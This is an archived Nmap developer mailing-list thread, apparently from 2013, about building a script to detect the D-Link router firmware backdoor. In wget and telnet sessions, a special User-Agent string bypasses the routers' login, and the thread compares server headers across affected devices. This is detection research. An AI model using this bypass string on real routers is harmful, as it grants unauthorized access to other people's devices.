Nmap Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: D-Link firmware backdoor

From: David Maynor <dave () erratasec com>
Date: Wed, 16 Oct 2013 12:54:05 +0000
These are done against the same IP, only difference is the user agent:
Davids-Mac-mini:dlink_scan dave$ wget -S --user-agent="xmlset_roodkcableoj28840ybtide" http://xxx.xxx.xxx.xxx
--2013-10-15 16:59:43--  http://xxx.xxx.xxx.xxx/
Connecting to xxx.xxx.xxx.xxx:80... connected.
HTTP request sent, awaiting response... 
 HTTP/1.0 200 OK
 Server: Alpha_webserv
 Date: Tue, 15 Oct 2013 20:59:44 GMT
 Content-Type: text/html
 Accept-Ranges: bytes
 Connection: close
 X-Pad: avoid browser bug
Length: unspecified [text/html]
Saving to: ‘index.html’

   [ <=>                                                                                                                
                                                          ] 1,445       --.-K/s   in 0.009s  

2013-10-15 16:59:44 (149 KB/s) - ‘index.html’ saved [1445]

Davids-Mac-mini:dlink_scan dave$ wget -S http://xxx.xxx.xxx.xxx
--2013-10-15 17:00:09--  http://xxx.xxx.xxx.xxx/
Connecting to xxx.xxx.xxx.xxx:80... connected.
HTTP request sent, awaiting response... 
 HTTP/1.1 401 Unauthorized
 Server: thttpd-alphanetworks/2.23
 Content-Type: text/html
 Date: Tue, 15 Oct 2013 21:00:10 GMT
 Last-Modified: Tue, 15 Oct 2013 21:00:10 GMT
 Accept-Ranges: bytes
 Connection: close
 WWW-Authenticate: Basic realm="BRL-04R"
Authorization failed.
Davids-Mac-mini:dlink_scan dave$

The server field gets set depending on you agh status. No auth gets you thttpd-alphanetworks/2.23 and auth gets 
Alpha_webserv

On Oct 16, 2013, at 7:49 AM, Michael Meyer <michael.meyer () greenbone net> wrote:


*** Patrik Karlsson wrote:


Please find a script attached to detect the D-Link firmware bypass outlined
in this article:
http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/

It's been a while since I committed something, so I will wait for some
feedback before I do.


Just a note about...


and server:match("^thttpd%-alphanetworks"))


On some affected devices the server header is 'Server: Alpha_webserv'
instead of 'Server: thttpd-alphanetworks/'...


if ( response.status == 200 )


...and there are also some devices which do not send a header
at all when this fake user-agent is set. On such devices you
could check for the existence of 'self.location.href' after
successfully bypassing the login.

mime@kira[6]:~ (1)$ telnet 192.168.44.8 8080
Trying 192.168.44.8...
Connected to 192.168.44.8.
Escape character is '^]'.
GET / HTTP/1.0

HTTP/1.0 401 Unauthorized
Server: thttpd-alphanetworks/2.23
Content-Type: text/html
Date: Tue, 15 Oct 2013 11:51:23 GMT
Last-Modified: Tue, 15 Oct 2013 11:51:23 GMT
Accept-Ranges: bytes
Connection: close
WWW-Authenticate: Basic realm="BRL-04UR"

<HTML><HEAD><TITLE>401 Unauthorized</TITLE>
[...]

mime@kira[6]:~ (1)$ telnet 192.168.44.8 8080
Trying 192.168.44.8...
Connected to 192.168.44.8.
Escape character is '^]'.
GET / HTTP/1.0
User-Agent: xmlset_roodkcableoj28840ybtide

<HTML>
<HEAD>
<TITLE>BRL-04UR</TITLE>
[...]
  self.location.href="index1.htm";
[...]

Micha

-- 
Michael Meyer                            OpenPGP Key: 52A6EFA6
http://www.greenbone.net/
Greenbone Networks GmbH, Neuer Graben 17, 49074 Osnabrück | AG
Osnabrück, HR B 202460
Geschäftsführer: Lukas Grunwald, Dr. Jan-Oliver Wagner
_______________________________________________
Sent through the dev mailing list
http://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/

Attachment: signature.asc
Description: Message signed with OpenPGP using GPGMail

_______________________________________________
Sent through the dev mailing list
http://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/
Previous By Date Next
Previous By Thread Next

Current thread: